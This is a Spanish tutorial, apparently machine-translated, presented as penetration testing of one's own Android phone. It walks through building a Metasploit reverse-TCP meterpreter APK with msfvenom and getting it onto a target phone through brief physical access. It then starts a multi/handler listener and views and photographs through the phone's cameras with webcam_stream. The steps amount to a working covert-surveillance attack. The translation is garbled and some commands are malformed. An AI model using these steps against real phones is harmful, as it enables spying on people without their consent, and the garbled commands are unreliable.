Ha habido varios informes de piratería Android cámaras de teléfonos para espiar a sus usuarios o proporcionarles imágenes falsas. Como propietario de un teléfono de alerta, puede intentar evitarlo evaluando la probabilidad y los riesgos reales de un evento tan amenazante.

Kali Linux es una de las mejores herramientas para comprobarlo Android Posibles vulnerabilidades de la cámara del teléfono a través de pruebas de penetración. Puede ayudarlo a mantenerse al tanto de cualquier intento de piratas informáticos de acceder de forma remota a la cámara de su teléfono.

Instalación de una carga útil operativa

Para usar Kali Linux para una prueba de penetración, primero descárguelo de sitio oficial. Consulte este tutorial anterior para obtener definiciones de varias jergas, como «msfvenom», «msfconsole», «meterpreter» y muchas más que se utilizarán en este ejercicio.

El primer paso en las pruebas de penetración es instalar una carga útil estándar en el dispositivo. Para hacer esto, abra la terminal Kali Linux e ingrese el siguiente comando: ifconfig. Esto le dará la dirección IP de su sesión de Kali Linux.

Ahora ingrese el comando a continuación usando la dirección IP anterior. El número de puerto para exploits, troyanos y otras vulnerabilidades se suele dar como 4444.

msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > Payload.apk

En este paso, intente inyectar una carga útil de metasploit basada en un intérprete de Java. Si tiene éxito, la prueba de penetración lo ayudará a verificar si su teléfono es vulnerable a alguien que escucha llamadas telefónicas, accede a mensajes de texto, localiza geográficamente al usuario, etc.

En este caso, el intento es mostrar cómo se puede utilizar la operación para acceder a las cámaras del teléfono.

Una vez iniciada la operación, se instalará un archivo APK llamado «Subir» en la carpeta raíz. Debes instalarlo en un objetivo Android llamada. Sin embargo, esto es más fácil decirlo que hacerlo. El más reciente Android los teléfonos y los correos electrónicos se negarán a llevar este tipo de archivos infectados con malware, y eso es bueno.

Sin embargo, esto aún se puede hacer mediante un cable USB o archivos temporales. Si un pirata informático tiene acceso a su teléfono durante unos minutos, lo vuelve algo vulnerable. Nuestro esfuerzo aquí en esta prueba de penetración es determinar el alcance preciso del riesgo involucrado.

Una vez transferido, debe encontrar una manera de instalar el archivo de carga útil en su teléfono. A menos que sea muy viejo Android versión, su teléfono debería darle más advertencias antes de que se pueda instalar el APK. Sin embargo, no importa Android versión del teléfono, hay muchas otras formas de instalar aplicaciones de fuentes desconocidas en un Android llamada.

Lanzamiento del exploit

Para iniciar la operación de carga útil anterior, ingrese el siguiente comando: msfconsole. Solo tomará unos segundos completar el comando, y el metasploit se puede preparar para más pruebas de penetración en las cámaras del teléfono.

El metasploit dará su propia descripción completa. El resumen de la carga útil también es visible. Muestra el número de granjas en funcionamiento.

En el siguiente paso, msfconsole está listo para ejecutar el exploit. Para hacer esto, consulte la dirección IP y el número de puerto (4444) descritos anteriormente. En consecuencia, ingrese los siguientes comandos:

exploit (multi/handler) > set LHOST "IP Address" [ENTER]
set LPORT "Port number" [ENTER]
exploit [ENTER]

Cuando el controlador de TCP inverso está habilitado, verá varias etapas de inicio de Meterpreter. Espere unos segundos mientras se diagnostica el teléfono de destino.

Cabe mencionar aquí que los más modernos Android Los teléfonos seguirán negando este acceso. Recuerda que esta es una prueba de penetración. Si tuyo Android el teléfono no puede ser penetrado usando este archivo APK mortal, significa que el fabricante de su teléfono está al tanto de este vector de ataque en particular.

Accede al archivo Android Cámara del teléfono

Si logró capturar el exploit en su teléfono, es probable que pueda ser penetrado ahora. Cuando esto suceda, el «contador» de un terminal Kali Linux podrá establecer una conexión con el teléfono. En este punto ingrese help para acceder a más opciones en Android teléfono atacado.

Ingrese los siguientes comandos (desde el menú de ayuda) para acceder a las cámaras del teléfono. En este exploit, se intentó acceder a la cámara trasera para tomar fotos desde el terminal.

webcam_list [ENTER]
1. Back camera
2. Front camera [ENTER]
webcam_stream -i 1

Para pasar una prueba de penetración, una vez que pueda acceder a la cámara, tome una foto y guárdela en la carpeta raíz de Kali Linux. También puede editar, cambiar el nombre o eliminar otras imágenes almacenadas. Por lo tanto, cualquier penetración exitosa del teléfono probado es una señal de alerta sobre la probabilidad de un ataque real, lo que significa que es hora de elegir una solución de seguridad.

En este tutorial, aprendió cómo Android se puede acceder a la cámara desde un terminal Kali Linux para realizar pruebas de penetración.

Este es un artículo de investigación de seguridad. Si ingresa a la habitación de otra persona para una demostración, siempre obtiene el permiso primero, a menos que, por supuesto, sea su propio teléfono. Recuerde revisar estas aplicaciones de piratería para Android para ayudarlo a probar y encontrar vulnerabilidades en su teléfono